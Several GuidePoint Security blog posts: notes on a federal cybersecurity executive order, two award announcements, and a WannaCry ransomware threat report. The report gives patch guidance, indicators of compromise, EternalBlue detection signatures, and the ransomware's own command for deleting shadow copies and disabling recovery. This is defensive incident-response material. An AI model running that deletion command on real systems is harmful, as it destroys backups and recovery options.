The take-aways below are specific to Section 1, and do not cover the entire EO, but outline some important points to note. It does not cover Section 2 and 3, which are about how agencies in the Executive Branch should support non-government entities and does not cover Section 4, which offers up some definitions for clarity. It is important to note that this EO covers all Civilian, DoD and IC agencies not part of the Legislative Branch or Judicial Branch of government. Quick Hits:

  • Section 1 b (i) defines Cybersecurity Risk Management as:
    • Protecting IT from unauthorized access
    • Maintaining awareness of threats
    • Detecting anomalies and incidents
    • Mitigating the impact of incidents through response and recovery
      (NOTE: These points closely map to the NIST categories below in Figure 1)
  • Section 1 b (iv) Specifically calls out known but unmitigated vulnerabilities as the highest risk to agencies.
  • Section 1 b (v) Exhorts agency leadership to personally head integration of different typically silo’d teams such as IT, security, budgeting, acquisition, policy, and HR for better risk management.
  • Section 1 c (i) Agency heads should implement risk management measures to prevent harm from unauthorized:
    • Access
    • Use
    • Disclosure
    • Disruption (of government services)
    • Modification (of government owned data)
    • Destruction (of government data or IT infrastructure)
  • Section 1 c (ii) Establishes the NIST Cybersecurity Framework as the standard measurement to manage cybersecurity risk, overriding any DoD or IC standards. It mandates a risk management report by each agency within 90 days.
  • Section 1 c (iii) Establishes both DHS and OMB as the joint assessor of each agencies’ report to determine if it is sufficient to manage the cybersecurity risk of that agency. For the first time, it is commanded that DoD and IC agencies, must now report to DHS and OMB both as authorities for Cybersecurity.
  • Section 1 c (iv) Mandates that OMB and DHS have 60 days from time of receiving each agency’s report to send the President a determination from Section 1 c (iii) and a plan of action going forward for each agency.
  • Section 1 c (vi) Mandates that agencies (DoD, IC, and Civilian) move to “shared IT services” which appears to be public or private cloud and requires a report on that effort within 90 days.

Figure 1. NIST Functions Graphic

Now we will focus on Section 1 c (ii) of the EO, where the President defines the NIST Cybersecurity Framework as the official standard that Executive Branch agencies should be managing their risk against. It then mandates that a report be created by each agency under the President’s authority (which includes Civilian, DoD and IC, but not Legislative or Judicial organizations) within 90 days of the EO being issued.

This means that each agency be able to show that they can:

  • Identify systems, assets, data, and capabilities.
  • Protect delivery of critical services.
  • Detect threats and attacks defined as cybersecurity events.
  • Respond to threats and attacks detected as cybersecurity events.
  • Recover from attacks and compromises by maintaining plans for resilience and plans for restoring services.

Anyone who is familiar with government cybersecurity will recognize Figure 1. as the NIST “Functions” graphic from the official NIST.gov Cybersecurity Framework document. This is not new information. However, the question is, “How do I measure myself against this NIST Framework for my report to DHS and OMB?” Some Federal customers we work with are well down the path to delivering on the EO’s reporting mandate, however, some of our customers have previously decided to devote all resources to securing their infrastructure, rather than tracking, for reporting purposes, how they map to the NIST framework.

Following the NIST categories, we recommend agencies start by discovering and profiling to Identify assets, software and vulnerabilities that need to be addressed. Protecting, the next category, requires mapping that information to a current network infrastructure and resolving any high-risk gaps. Detecting threats, Responding to attacks, and Recovering from events involves both technical products and establishing a codified policy inside the agency.

Check out our next blog that will detail some quick-hit products to improve an agency’s security posture for the last three NIST categories (Detect, Respond, Recover). The first two, Identify and Protect, can be done quickly, if not in place already, to show compliance to the NIST framework before the report needs to be completed. It only requires a comprehensive end point profiler and a Network Vulnerability Management solution that consumes asset, vulnerability, and network configuration information and map them together into something like Figure 2.

Figure 2. (RedSeal Graphic)

Finally, a Governance, Risk and Compliance (GRC) product that can consume all technical and policy information to produce a comprehensive NIST compliance and risk assessment report. If an agency is already using a GRC product now, they simply need to configure and start running NIST modules that produce the reporting needed. However, many agencies do not run GRC products yet. GRC products, in general, have developed a reputation for their difficulty to stand up and get operating well for something like this, however, there are GRC solutions that are not difficult and cumbersome. GuidePoint has been working with specific GRC products that are designed specifically to stand up, integrate, and provide reporting on modules like NIST compliance status quickly, meeting the needs for responding to the EO.

Contact us at federal@guidepointsecurity.com for assistance in helping your agency respond with the best possible report to DHS/OMB today!

About the author:

Jean-Paul Bergeaux, Federal CTO, GuidePoint Security

With more than 18 years of experience in the Federal technology industry, Jean-Paul Bergeaux is currently the Federal CTO for GuidePoint Security. JP’s career has been marked by success in technical leadership roles with ADIC (now Quantum), NetApp and Commvault and SwishData. Jean-Paul focuses on identifying customers’ challenges and architecting innovative solutions to solve their complex problems. He is also a thought leader on topics that are top of mind for Federal IT Managers like Cyber Security, VDI, Big Data, and Backup & Recovery.

Lisa Morehouse of GuidePoint Named a Power 30 Solution Provider in CRN’s 2017 Women of the Channel

GuidePoint Security LLC, announced today that CRN®, a brand of The Channel Company, has named Lisa Morehouse, Vice President of Operations, to its list of 2017 Power 30 Solution Providers, an elite subset of its prestigious annual Women of the Channel list.

CRN’s editorial team selects Women of the Channel honorees based on their professional accomplishments, demonstrated expertise and ongoing dedication to the channel. The Power 30 Solution Providers belong to an exclusive group drawn from this larger list: women leaders in solution provider organizations whose vision and influence are key drivers of their companies’ success and help move the entire IT channel forward.

Lisa Morehouse, who joined GuidePoint in 2012, has worked in the channel for over a decade. At GuidePoint, she developed and executed the vast majority of the daily operations, including accounting and finance, contracts and legal, as well as human resources and sales operations. Morehouse has been instrumental in increasing the organization’s channel business by building and expanding distribution relationships, and educating internal and external stakeholders about the value of the channel. Her knowledge, experience and expertise all played a vital role in helping GuidePoint become one of the top cybersecurity companies in the country.

“These extraordinary executives support every aspect of the channel ecosystem, from technical innovation to marketing to business development, working tirelessly to keep the channel moving into the future,” said Robert Faletra, CEO of The Channel Company. “They are developing fresh go-to-market strategies, strengthening the channel’s network of partnerships and building creative new IT solutions, among many other contributions. We congratulate all the 2017 Women of the Channel on their stellar accomplishments and look forward to their future success.”

“Lisa has been an essential member of the company since nearly the beginning,” stated GuidePoint Security Founder and Managing Partner Michael Volk. “Her many contributions, hard work, and continuous efforts are just some of the reasons GuidePoint has been able to accomplish so much in such a very short period of time. We are all very proud of Lisa and thrilled she has been recognized as one of the members of such a distinguished group of women in the channel,” Volk concluded.

To read more about Lisa Morehouse and her contributions, visit http://wotc.crn.com/wotc2017-details.htm?w=333.

The 2017 Women of the Channel and Power 30 Solution Provider lists will be featured in the June issue of CRN Magazine and online at www.CRN.com/wotc.

About GuidePoint Security
GuidePoint Security LLC provides innovative and valuable cybersecurity solutions and expertise that enable organizations to successfully achieve their missions. By embracing new technologies, GuidePoint Security helps clients recognize the threats, understand the solutions, and mitigate the risks present in their evolving IT environments. Headquartered in Herndon, Virginia, GuidePoint Security is a small business, and classification is with the System for Award Management (SAM). Learn more at: http://www.guidepointsecurity.com.

About the Channel Company
The Channel Company enables breakthrough IT channel performance with our dominant media, engaging events, expert consulting and education, and innovative marketing services and platforms. As the channel catalyst, we connect and empower technology suppliers, solution providers and end users. Backed by more than 30 years of unequaled channel experience, we draw from our deep knowledge to envision innovative new solutions for ever-evolving challenges in the technology marketplace. www.thechannelco.com Copyright ©2017. The Channel Company, LLC. CRN is a registered trademark of The Channel Company, LLC. All rights reserved..

vSOC SPOT Report – WCrypt (WanaCrypt0r 2.0) – Ransomware Attack

Latest Updates

2017-05-14 10:08 EDT

Researchers are reporting that a new variant of the WannaCrypt malware has been observed in the wild notably missing the kill switch check for the www.Iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com domain that @MalwareTechLab registered to stop the first variant from propagating as fast. It has been speculated that the kill switch was actually a poorly implemented check to see if the malware was running in a sandbox. Even variants with the kill switch can continue to propagate and infect vulnerable networks through phishing emails or other lateral movement capabilities.

It is imperative that all Windows systems be patched. Microsoft released an out-of-band patch for deprecated operating systems to include Windows XP and Server 2003 Saturday to help thwart this campaign. vSOC will remain diligent in monitoring all client environments for signs of compromise or infection.

GuidePoint recommends disabling SMBv1 using a GPO or PowerShell script:

Via GPO

To enable or disable SMBv1 on the SMB server, configure the following registry key (a reboot is required):

Registry subkey: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\ParametersRegistry entry: SMB1
REG_DWORD: 0 = Disabled
REG_DWORD: 1 = Enabled
Default: 1 = Enabled
To enable or disable SMBv2 on the SMB server, configure the following registry key:
Registry subkey:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\ParametersRegistry entry: SMB2
REG_DWORD: 0 = Disabled
REG_DWORD: 1 = Enabled
Default: 1 = Enabled

Via PowerShell

To disable SMBv1 on the SMB server, run the following cmdlet:

Set-ItemProperty -Path “HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters” SMB1 -Type DWORD -Value 0 -Force

To enable SMBv2 and SMBv3 on the SMB server, run the following cmdlet:

Set-ItemProperty -Path “HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters” SMB2 -Type DWORD -Value 1 -Force

2017-05-12 22:28 EDT

A UK malware researcher whose Twitter handle is @MalwareTechLab “accidentally” stopped one wide-spread variant of the ransomware from propagating further by registering a domain discovered while analyzing the code. The domain, Iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com is a kill switch that the code sends a GET request for. If the domain is not found, the code continues and infects the host. If the domain is found the code exits and the host is not infected. As long as the domain does not get revoked or taken down, this particular variant will cease infecting new machines. New variants are likely to spring up in the coming days and weeks without this kill switch feature, so due diligence is highly recommended along with patching all vulnerable systems and disabling SMB v1.

Based on this latest information, GuidePoint recommends our original mitigation steps:

  • All systems be updated to the latest patch available from Microsoft. The patch specific to the exploit kit is labeled KB4012598 or MS17-010 and should be evaluated for deployment immediately if it has not already been applied. This will prevent the SMB traffic from exploiting the vulnerability, and eliminates initial infection vectors.
  • Application whitelisting be applied to prevent any applications from running which are not from a specified location or signed by the whitelisted vendor.
  • You create and maintain offline backups of critical data which will reduce the amount of damage a crypto- ransomware attack is capable of inflicting.
  • You ensure your antivirus definitions are up to date. Most major anti-virus vendors have been provided samples of this malware and have developed detections and definitions. Currently, approximately 31 out of 60 A/V vendors tested can recognize and stop this infection. Major vendors not included in the list include Symantec and Sophos.

Latest Indicators of Compromise

2017-05-12 22:36 EDT

File Names

  • mssecsvc.exe
  • @wanadecryptor@.exe
  • taskdl.exe
  • taskse.exe
  • tasksche.exe
  • tor.exe
  • @Please_Read_me@.txt

File Extensions

  • .wcry
  • .wncry
  • .wncryt
  • .wncy

Windows Service Name

  • mssecsvc2.0
  • Microsoft Security Center (2.0) Service

File Strings

  • Wanna Decryptor 1.0
  • Wana DecryptOr
  • Wana Decrypt0r
  • WANNACRY
  • WanaCryptOr
  • WanaCrypt0r
  • WANACRY!
  • WNcry@2o17

File Hash Values

  • ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa
  • c365ddaa345cfcaff3d629505572a484cff5221933d68e4a52130b8bb7badaf9
  • 09a46b3e1be080745a6d8d88d6b5bd351b1c7586ae0dc94d0c238ee36421cafa
  • 0a73291ab5607aef7db23863cf8e72f55bcb3c273bb47f00edf011515aeb5894
  • 428f22a9afd2797ede7c0583d34a052c32693cbb55f567a60298587b6e675c6f
  • 5c1f4f69c45cff9725d9969f9ffcf79d07bd0f624e06cfa5bcbacd2211046ed6
  • 62d828ee000e44f670ba322644c2351fe31af5b88a98f2b2ce27e423dcf1d1b1
  • 72af12d8139a80f317e851a60027fdf208871ed334c12637f49d819ab4b033dd
  • 85ce324b8f78021ecfc9b811c748f19b82e61bb093ff64f2eab457f9ef19b186
  • a1d9cd6f189beff28a0a49b10f8fe4510128471f004b3e4283ddc7f78594906b
  • a93ee7ea13238bd038bcbec635f39619db566145498fe6e0ea60e6e76d614bd3
  • b43b234012b8233b3df6adb7c0a3b2b13cc2354dd6de27e092873bf58af2693c
  • eb47cd6a937221411bb8daf35900a9897fb234160087089a064066a65f42bcd4
  • 24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c
  • 2c2d8bc91564050cf073745f1b117f4ffdd6470e87166abdfcd10ecdff040a2e
  • 7a828afd2abf153d840938090d498072b7e507c7021e4cdd8c6baf727cafc545
  • a897345b68191fd36f8cefb52e6a77acb2367432abb648b9ae0a9d708406de5b
  • fb0b6044347e972e21b6c376e37e1115dab494a2c6b9fb28b92b1e45b45d0ebc
  • 9588f2ef06b7e1c8509f32d8eddfa18041a9cc15b1c90d6da484a39f8dcdf967
  • b43b234012b8233b3df6adb7c0a3b2b13cc2354dd6de27e092873bf58af2693c
  • 4186675cb6706f9d51167fb0f14cd3f8fcfb0065093f62b10a15f7d9a6c8d982
  • 2584e1521065e45ec3c17767c065429038fc6291c091097ea8b22c8a502c41dd
  • 2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d
  • 4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79

Command and Control IP’s:

  • 188.166.23.127:443
  • 193.23.244.244:443
  • 2.3.69.209:9001
  • 50.7.161.218:9001
  • 217.79.179.77
  • 128.31.0.39
  • 213.61.66.116
  • 212.47.232.237
  • 81.30.158.223
  • 79.172.193.32
  • 89.45.235.21
  • 38.229.72.16
  • 188.138.33.220
  • 146.0.32.144:9001
  • 188.166.23.127:443
  • 193.23.244.244:443

Sender IPs:

  • 205.186.153.200
  • 96.127.190.2
  • 184.154.48.172
  • 200.58.103.166
  • 216.145.112.183
  • 162.220.58.39
  • 192.237.153.208
  • 146.0.32.144
  • 188.166.23.127
  • 50.7.161.218
  • 2.3.69.209
  • 74.125.104.145
  • 75.126.5.21

Tor Onion URL’s:

  • 57g7spgrzlojinas.onion
  • 76jdd2ir2embyv47.onion
  • cwwnhwhlz52maqm7.onion
  • gx7ekbenv2riucmf.onion
  • sqjolphimrr7jqw6.onion
  • Xxlvbrloxvriy2c5.onion

Mutex:

  • ShimCacheMutex
  • Global\MsWinZonesCacheCounterMutexA0
  • MsWinZonesCacheCounterMutexA

Domains:

  • R12.sn-h0j7sn7s.gvt1.com
  • Iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com

Email Sender:

  • alertatnb@serviciobancomer.com

Kill Switch Domain:

  • www.Iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com

Snort Signatures:

alert tcp $HOME_NET 445 -> any any (msg:”ET EXPLOIT Possible ETERNALBLUE MS17-010 Echo Response”; flow:from_server,established; content:”|00 00 00 31 ff|SMB|2b 00 00 00 00 98 07 c0|”; depth:16; fast_pattern; content:”|4a 6c 4a 6d 49 68 43 6c 42 73 72 00|”; distance:0; flowbits:isset,ETPRO.ETERNALBLUE; classtype:trojan-activity; sid:2024218; rev:2;)

alert smb any any -> $HOME_NET any (msg:”ET EXPLOIT Possible ETERNALBLUE MS17-010 Heap Spray”; flow:to_server,established; content:”|ff|SMB|33 00 00 00 00 18 07 c0 00 00 00 00 00 00 00 00 00 00 00 00 00|”; offset:4; depth:25; content:”|08 ff fe 00 08 41 00 09 00 00 00 10|”; within:12; fast_pattern; content:”|00 00 00 00 00 00 00 10|”; within:8; content:”|00 00 00 10|”; distance:4; within:4; pcre:”/^[a-zA-Z0-9+/]{1000,}/R”; threshold: type threshold, track by_src, count 12, seconds 1; classtype:trojan-activity; sid:2024217; rev:1;)

alert smb any any -> $HOME_NET any (msg:”ET EXPLOIT Possible ETERNALBLUE MS17-010 Echo Request (set)”; flow:to_server,established; content:”|00 00 00 31 ff|SMB|2b 00 00 00 00 18 07 c0|”; depth:16; fast_pattern; content:”|4a 6c 4a 6d 49 68 43 6c 42 73 72 00|”; distance:0; flowbits:set,ETPRO.ETERNALBLUE; flowbits:noalert; classtype:trojan-activity; sid:2024220; rev:1;)

alert smb $HOME_NET any -> any any (msg:”ET EXPLOIT Possible ETERNALBLUE MS17-010 Echo Response”; flow:from_server,established; content:”|00 00 00 31 ff|SMB|2b 00 00 00 00 98 07 c0|”; depth:16; fast_pattern; content:”|4a 6c 4a 6d 49 68 43 6c 42 73 72 00|”; distance:0; flowbits:isset,ETPRO.ETERNALBLUE; classtype:trojan-activity; sid:2024218; rev:1;)
http://docs.emergingthreats.net/bin/view/Main/2024218

The ransomware encrypts files with the following extensions:

.der, .pfx, .key, .crt, .csr, .p12, .pem, .odt, .ott, .sxw, .stw, .uot, .3ds, .max, .3dm, .ods, .ots, .sxc, .stc, .dif, .slk, .wb2, .odp, .otp, .sxd, .std, .uop, .odg, .otg, .sxm, .mml, .lay, .lay6, .asc, .sqlite3, .sqlitedb, .sql, .accdb, .mdb, .dbf, .odb, .frm, .myd, .myi, .ibd, .mdf, .ldf, .sln, .suo, .cpp, .pas, .asm, .cmd, .bat, .ps1, .vbs, .dip, .dch, .sch, .brd, .jsp, .php, .asp, .java, .jar, .class, .mp3, .wav, .swf, .fla, .wmv, .mpg, .vob, .mpeg, .asf, .avi, .mov, .mp4, .3gp, .mkv, .3g2, .flv, .wma, .mid, .m3u, .m4u, .djvu, .svg, .psd, .nef, .tiff, .tif, .cgm, .raw, .gif, .png, .bmp, .jpg, .jpeg, .vcd, .iso, .backup, .zip, .rar, .tgz, .tar, .bak, .tbk, .bz2, .PAQ, .ARC, .aes, .gpg, .vmx, .vmdk, .vdi, .sldm, .sldx, .sti, .sxi, .602, .hwp, .snt, .onetoc2, .dwg, .pdf, .wk1, .wks, .123, .rtf, .csv, .txt, .vsdx, .vsd, .edb, .eml, .msg, .ost, .pst, .potm, .potx, .ppam, .ppsx, .ppsm, .pps, .pot, .pptm, .pptx, .ppt, .xltm, .xltx, .xlc, .xlm, .xlt, .xlw, .xlsb, .xlsm, .xlsx, .xls, .dotx, .dotm, .dot, .docm, .docb, .docx, .doc

Once started it immediately spawns several processes to change file permissions and communicate with tor hidden c2 servers:

attrib +h .
icacls . /grant Everyone:F /T /C /Q
C:\Users\xxx\AppData\Local\Temp\taskdl.exe
@WanaDecryptor@.exe fi
300921484251324.bat
C:\Users\xxx\AppData\Local\Temp\taskdl.exe
C:\Users\xxx\AppData\Local\Temp\taskdl.exe
The malware creates mutex “Global\MsWinZonesCacheCounterMutexA” and runs the command:
cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet

Files:

  • [Installed_Folder]\00000000.eky
  • [Installed_Folder]\00000000.pky
  • [Installed_Folder]\00000000.res
  • [Installed_Folder]\@WanaDecryptor@.exe
  • [Installed_Folder]\@WanaDecryptor@.exe.lnk
  • [Installed_Folder]\b.wnry
  • [Installed_Folder]\c.wnry
  • [Installed_Folder]\f.wnry
  • [Installed_Folder]\msg\
  • [Installed_Folder]\msg\m_bulgarian.wnry
  • [Installed_Folder]\msg\m_chinese (simplified).wnry
  • [Installed_Folder]\msg\m_chinese (traditional).wnry
  • [Installed_Folder]\msg\m_croatian.wnry
  • [Installed_Folder]\msg\m_czech.wnry
  • [Installed_Folder]\msg\m_danish.wnry
  • [Installed_Folder]\msg\m_dutch.wnry
  • [Installed_Folder]\msg\m_english.wnry
  • [Installed_Folder]\msg\m_filipino.wnry
  • [Installed_Folder]\msg\m_finnish.wnry
  • [Installed_Folder]\msg\m_french.wnry
  • [Installed_Folder]\msg\m_german.wnry
  • [Installed_Folder]\msg\m_greek.wnry
  • [Installed_Folder]\msg\m_indonesian.wnry
  • [Installed_Folder]\msg\m_italian.wnry
  • [Installed_Folder]\msg\m_japanese.wnry
  • [Installed_Folder]\msg\m_korean.wnry
  • [Installed_Folder]\msg\m_latvian.wnry
  • [Installed_Folder]\msg\m_norwegian.wnry
  • [Installed_Folder]\msg\m_polish.wnry
  • [Installed_Folder]\msg\m_portuguese.wnry
  • [Installed_Folder]\msg\m_romanian.wnry
  • [Installed_Folder]\msg\m_russian.wnry
  • [Installed_Folder]\msg\m_slovak.wnry
  • [Installed_Folder]\msg\m_spanish.wnry
  • [Installed_Folder]\msg\m_swedish.wnry
  • [Installed_Folder]\msg\m_turkish.wnry
  • [Installed_Folder]\msg\m_vietnamese.wnry
  • [Installed_Folder]\r.wnry
  • [Installed_Folder]\s.wnry
  • [Installed_Folder]\t.wnry
  • [Installed_Folder]\TaskData\
  • [Installed_Folder]\TaskData\Data\
  • [Installed_Folder]\TaskData\Data\Tor\
  • [Installed_Folder]\TaskData\Tor\
  • [Installed_Folder]\TaskData\Tor\libeay32.dll
  • [Installed_Folder]\TaskData\Tor\libevent-2-0-5.dll
  • [Installed_Folder]\TaskData\Tor\libevent_core-2-0-5.dll
  • [Installed_Folder]\TaskData\Tor\libevent_extra-2-0-5.dll
  • [Installed_Folder]\TaskData\Tor\libgcc_s_sjlj-1.dll
  • [Installed_Folder]\TaskData\Tor\libssp-0.dll
  • [Installed_Folder]\TaskData\Tor\ssleay32.dll
  • [Installed_Folder]\TaskData\Tor\taskhsvc.exe
  • [Installed_Folder]\TaskData\Tor\tor.exe
  • [Installed_Folder]\TaskData\Tor\zlib1.dll
  • [Installed_Folder]\taskdl.exe
  • [Installed_Folder]\taskse.exe
  • [Installed_Folder]\u.wnry
  • [Installed_Folder]\wcry.exe

Registry Entries:

  • HKCU\Software\Microsoft\Windows\CurrentVersion\Run\[random] “[Installed_Folder]\tasksche.exe
  • HKCU\Software\WanaCrypt0r\
  • HKCU\Software\WanaCrypt0r\wd [Installed_Folder]
  • HKCU\Control Panel\Desktop\Wallpaper “[Installed_Folder]\Desktop\@WanaDecryptor@.bmp”

Email Subjects:

  • FILE_<5 numbers>
  • SCAN_<5 numbers>
  • PDF_<4 or 5 numbers>

Email Attachment:

  • nm.pdf

Surricata SIgnatures (https://github.com/xNymia/Suricata-Signatures/blob/master/EquationGroup.rules):

# EternalBlue Signature matching potential NEW installation of SMB payloadalert tcp $HOME_NET any -> any any (msg:”EXPLOIT Possible Successful ETERNALBLUE Installation SMB MultiplexID = 82 – MS17-010″; flow:from_server,established; content:”|FF|SMB|32 02 00 00 c0|”; offset:4; depth:9; content:”|52 00|”; distance:21; within:23; classtype:trojan-activity; sid:5000072; rev:1;)

# EternalBlue Signature matching return signature for connection to pre-installed SMB payloadalert tcp $HOME_NET any -> any any (msg:”EXPLOIT Successful ETERNALBLUE Connection SMB MultiplexID = 81 – MS17-010″; flow:from_server,established; content:”|FF|SMB|32 02 00 00 c0|”; offset:4; depth:9; content:”|51 00|”; distance:21; within:23; classtype:trojan-activity; sid:5000073; rev:1;)

# Signature to identify what appears to be initial setup trigger for SMBv1 – MultiplexID 64 is another unusual valuealert tcp $HOME_NET any -> any any (msg:”EXPLOIT Possible ETERNALBLUE SMB Exploit Attempt Stage 1/2 – Tree Connect AndX MultiplexID = 64 – MS17-010″; flow:to_server,established; content:”|FF|SMB|75 00 00 00 00|”; offset:4; depth:9; content:”|40 00|”; distance:21; within:23; flowbits: set, SMB.v1.AndX.MID.64; classtype:trojan-activity; sid:5000074; rev:1;)

# Signature triggers on Trans2 Setup Request with MultiplexID – 65 – Another unusual MID – Only triggers if 64 was seen previously. alert tcp $HOME_NET any -> any any (msg:”EXPLOIT Possible ETERNALBLUE SMB Exploit Attempt Stage 2/2 – Trans2 SUCCESS MultiplexID = 65 – MS17-010″; flow:to_server,established; content:”|FF|SMB|32 00 00 00 00|”; offset:4; depth:9;

Overview

On Friday, May 12th, an attack being made against the United Kingdom National Health Service (NHS) and the Spain- based telecommunications company, Telefonica, was made public. Reports now show that both companies have been hit with the WCrypt (WanaCrypt0r 2.0) crypto-ransomware. This attack is being perpetrated through the use of the recently leaked Eternal Blue exploit, belonging to the exploit kits released by the ShadowBrokers dump from the compromise of the National Security Agency (NSA). This exploit has been weaponized as a worm using a previously unpatched SMB vulnerability. This exploit has verified infections in the US as well. While data is still filtering in, early reports indicate FedEx is among the first US businesses compromised.

WCrypt Data

WCrypt is a standard crypto-ransomware which, once on the user’s system, encrypts the user’s files with the threat of deletion of the encryption keys if the user does not pay the ransom within seven days. With this variant, the ransom is demanded within 3 days or the ransom amount doubles, and within 7 days if the ransom isn’t paid, the encryption keys are deleted rendering all encrypted data unrecoverable.

Recognizing WCrypt Infections

The infection stems from a file named: wannacry.exe. The Hashes are located below:

SHA256:

  • 2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d
  • 4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79
  • 09a46b3e1be080745a6d8d88d6b5bd351b1c7586ae0dc94d0c238ee36421cafa
  • 24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c
  • 2584e1521065e45ec3c17767c065429038fc6291c091097ea8b22c8a502c41dd

SHA1:

  • 45356a9dd616ed7161a3b9192e2f318d0ab5ad10
  • 51e4307093f8ca8854359c0ac882ddca427a813c

MD5:

  • 509c41ec97bb81b0567b059aa2f50fe8
  • 7bf2b57f2a205768755c07f238fb32cc
  • 7f7ccaa16fb15eb1c7399d422f8363e8

Once a system is infected with the ransomware, a screen similar to the following image appears informing the user of the infection as well as the ransom price and bitcoin address where the payment can be made.

WCrypt

The infection also typically spawns a large number of processes which are the result of the encryption process as well as the desktop theme changes and the decryptor listener.

Infection Vector: Eternal Blue

In the latest dump of the ShadowBroker’s exploits, Eternal Blue was considered especially dangerous due to its use of SMB v1 as the attack vector. This vulnerability was assigned the designation CVE-2017-0143, 0144, 0145, 0146, and 0147, it contains multiple avenues of attack and most Windows operating systems are vulnerable. This has been determined to be the method of infection from multiple sources, including Matthew Hickey, aka HackerFantastic, a reknown malware and security researcher. Of particular note is the presence of worm characteristics in the delivery. Once infected, the system becomes a part of the botnet for pushing the malware out.

Identifying Eternal Blue and the WCrypt Attack

A recently released screenshot, from malware researcher Kafiene, displays the traffic patterns for the Eternal Blue exploit.

Wcrypt Logs

As is evidenced in the image, most traffic is seen using port 445, whch is the standard port used by SMB v1 and v2. Network monitoring is essential to identify threats as they appear.

Mitigation

In order to mitigate this attack, it is recommended that:

  • All systems be updated to the latest patch available from Microsoft. The patch specific to the exploit kit is labeled KB4012598 or MS17-010 and should be evaluated for deployment immediately if it has not already been applied. This will prevent the SMB traffic from exploiting the vulnerability, and eliminates initial infection vectors.
  • Application whitelisting be applied to prevent any applications from running which are not from a specified location or signed by the whitelisted vendor.
  • You create and maintain offline backups of critical data which will reduce the amount of damage a crypto- ransomware attack is capable of inflicting.
  • You ensure your antivirus definitions are up to date. Most major anti-virus vendors have been provided samples of this malware and have developed detections and definitions. Currently, approximately 31 out of 60 A/V vendors tested can recognize and stop this infection. Major vendors not included in the list include Symantec and Sophos.

Matthew Hickey of Hacker House discovered the decryption binary in a zip file in the PE resources which is encrypted with the password of WNcry@2ol7. This can be used to potentially decrypt the files which were affected by the malware.

Final Analysis

The infections which have been occurring lead vSOC to believe these are not necessarily targeted attacks, rather the infection vectors are exploited automatically by the Eternal Blue exploit kit against vulnerable systems within the enterprise.

References:

Virginia Chamber Awards GuidePoint Security Highest Growth in Technology

The Virginia Chamber of Commerce celebrated 50 of the fastest growing Virginia companies at the 22nd annual “Virginia’s Fantastic 50 Awards Banquet”, held on April 27, at the Westfields Marriott in Chantilly. More than 400 attendees participated in the event, designed to recognize the companies for their success.

“We are thrilled to be honored by the Virginia Chamber and to be one of the 50 distinguished companies that make up the Fantastic 50,” noted Michael Volk, GuidePoint Security Founder and Managing Partner.

“Since the beginning, our organization has tried to meet the evolving requirements of our industry, while continuing our grow in a manner that helped our customers while still maintaining the highest level of quality,” added GuidePoint Founder and Principal Justin Morehouse.

At the conclusion of the awards banquet, the Chamber announced four Virginia Vanguard winners, recognized for the highest growth in the categories of service, technology, manufacturing, in addition to acknowledging the company with the highest overall growth in Virginia.

Virginia Vanguard Winners are:

Technology: GuidePoint Security LLC, Herndon
Service: Axis Global Enterprises, Virginia Beach
Manufacturing: O’Connor Brewing Company, Norfolk
Highest Overall Growth: Darkblade Systems, Stafford County

“We know that companies will grow and expand where they have the skilled workforce to support their mission,” said Barry DuVal, president and CEO of the Virginia Chamber of Commerce. “We are glad to toast the entrepreneurial spirit of these Virginia business leaders and the dedicated employees who have brought these companies continued success.”

About the Awards
Virginia’s FANTASTIC 50 award program is a signature event of the Virginia Chamber of Commerce. Now in its 22nd year, the FANTASTIC 50 program is the only annual statewide award recognizing Virginia’s fastest growing business.

About GuidePoint Security
GuidePoint Security LLC provides innovative and valuable cybersecurity solutions and expertise that enable organizations to successfully achieve their missions. By embracing new technologies, GuidePoint Security helps clients recognize the threats, understand the solutions, and mitigate the risks present in their evolving IT environments. Headquartered in Herndon, Virginia, GuidePoint Security is a small business, and classification is with the System for Award Management (SAM). Learn more at: http://www.guidepointsecurity.com.